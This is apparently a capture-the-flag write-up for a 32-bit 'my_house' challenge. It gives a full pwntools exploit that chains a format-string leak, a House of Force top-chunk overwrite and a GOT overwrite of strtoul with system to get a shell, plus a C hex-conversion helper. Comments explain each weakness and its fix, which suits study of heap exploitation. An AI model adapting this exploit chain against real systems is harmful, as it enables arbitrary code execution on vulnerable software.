h3xor ctf my_house 본문
house_of_force 이용 하장
마지막에 /bin/sh
exploit.py
# Python 2 / pwntools solve script for the "my_house" challenge (32-bit
# packing via p32 throughout). The write-up names the technique as House of
# Force. Read top to bottom, the script relies on three weaknesses in the
# target, each of which has a standard fix:
#   1. Input containing "%x" comes back as hex words, i.e. user data appears
#      to reach a printf-style call as the format string.
#      Fix: always pass a constant format (printf("%s", buf)) and build with
#      -Wformat -Wformat-security.
#   2. A write of 252 + 4 bytes into a chunk requested with size 0xf8 reaches
#      the size field of the following (top) chunk.
#      Fix: bound every write by the size actually allocated. glibc 2.29 and
#      later also abort with "malloc(): corrupted top size" when the top
#      chunk size is implausible.
#   3. A later allocation is made to land on the GOT entry of strtoul, which
#      is then overwritten.
#      Fix: link with full RELRO (-Wl,-z,relro,-z,now) so the GOT is
#      read-only, and reject allocation sizes outside a sane range.
# All numeric offsets below (0x1b25a0, 0x3ada0, 544 + 36) are tied to the
# author's libc build and heap layout; they are not portable.
from pwn import *

# Local binary is the active target; the remote endpoint is left commented out.
p = process("./my_house")
#p = remote("49.236.136.140",13000)
e = ELF("./my_house")

# First prompt: answer with exactly 256 bytes.
# NOTE(review): presumably fills a fixed-size field with no terminator so that
# a later message prints past it - confirm against the binary.
p.recv()
p.send("A" * 256)
p.recv()


def hexdemical_c(c):
    # Convert an integer to hex text by piping it through the ./he_x helper
    # (source shown as hexdemical_c.c on this page): the value is sent as a
    # decimal string and up to 8 characters of the helper's output are
    # returned.
    # NOTE(review): likely used because the distance computed below can be
    # negative and the C helper prints its 32-bit two's-complement form.
    a = process("./he_x")
    a.sendline(str(c))
    return a.recv(8)


#0xfc
# Weakness 1: the reply to "%x %x %x" is parsed for addresses.
p.send("%x %x %x")
p.recvuntil("have ")
# Skip the first printed word; the next 8 hex digits are treated as a libc
# pointer and rebased with a build-specific offset.
p.recvuntil(" ")
libc_base = int(p.recv(8),16) - 0x1b25a0
log.success("libc_base : " + hex(libc_base))
# The 9 characters after "at " are parsed as a hex address.
# NOTE(review): presumably a heap pointer printed by the program - confirm.
p.recvuntil("at ")
leaked = int(p.recv(9),16)
# Fixed distance from the leaked address to where the script expects the top
# chunk; valid only for this exact allocation sequence.
TOP_CHUNK = leaked + 544 + 36
# Distance from the top chunk to the strtoul GOT slot, minus 8.
# NOTE(review): the 8 looks like the 32-bit chunk header size - confirm.
victim = e.got["strtoul"] - TOP_CHUNK - 8
log.success("TOP_CHUNK : " + hex(TOP_CHUNK))
log.success("victim : " + hex(victim))
log.success("system : " + hex(libc_base + 0x3ada0))

# Menu option 1 with size "f8", then 0xf7 bytes of filler.
# NOTE(review): option 1 appears to allocate using a hex size string.
p.sendline("1")
p.sendline("f8")
p.send("B" * 0xf7)
p.recv()

# Weakness 2: option 3 / index 1 accepts 252 filler bytes plus one more 32-bit
# word, 0xffffffff. Per the write-up this word replaces the top chunk size.
p.sendline("3")
p.sendline("1")
p.send("C"*252 + p32(0xffffffff))
# Blocks until Enter is pressed on the local terminal.
raw_input()
print p.recv()

# Weakness 3: request an allocation whose size is the computed distance, given
# as hex text produced by the helper.
log.success("HEX : "+str(hexdemical_c(int(victim))))
p.sendline("1")
p.sendline(hexdemical_c(int(victim)))
p.recv()

# One more 0xf8 request; its contents are the address logged above as
# "system" (libc_base + 0x3ada0), which per the steps above ends up in the
# strtoul GOT slot.
p.sendline("1")
p.sendline("f8")
p.sendline( p32(libc_base + 0x3ada0))

# Hand the session over to the terminal.
p.interactive()
hexdemical_c.c
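#include <stdio.h>

/*
 * Read one decimal integer from stdin and print it in lowercase hexadecimal,
 * followed by a space and a newline.
 *
 * Returns 0 on success, 1 when no integer could be parsed from the input.
 */
int main()
{
    int a;

    /* scanf leaves `a` untouched when the input is not a number or stdin is
     * empty; printing it in that case would read an uninitialized value. */
    if (scanf("%d", &a) != 1)
        return 1;

    /* %x expects an unsigned int. The cast makes the conversion explicit, so
     * a negative input is printed as its 32-bit two's-complement pattern. */
    printf("%x \n", (unsigned int)a);
    return 0;
}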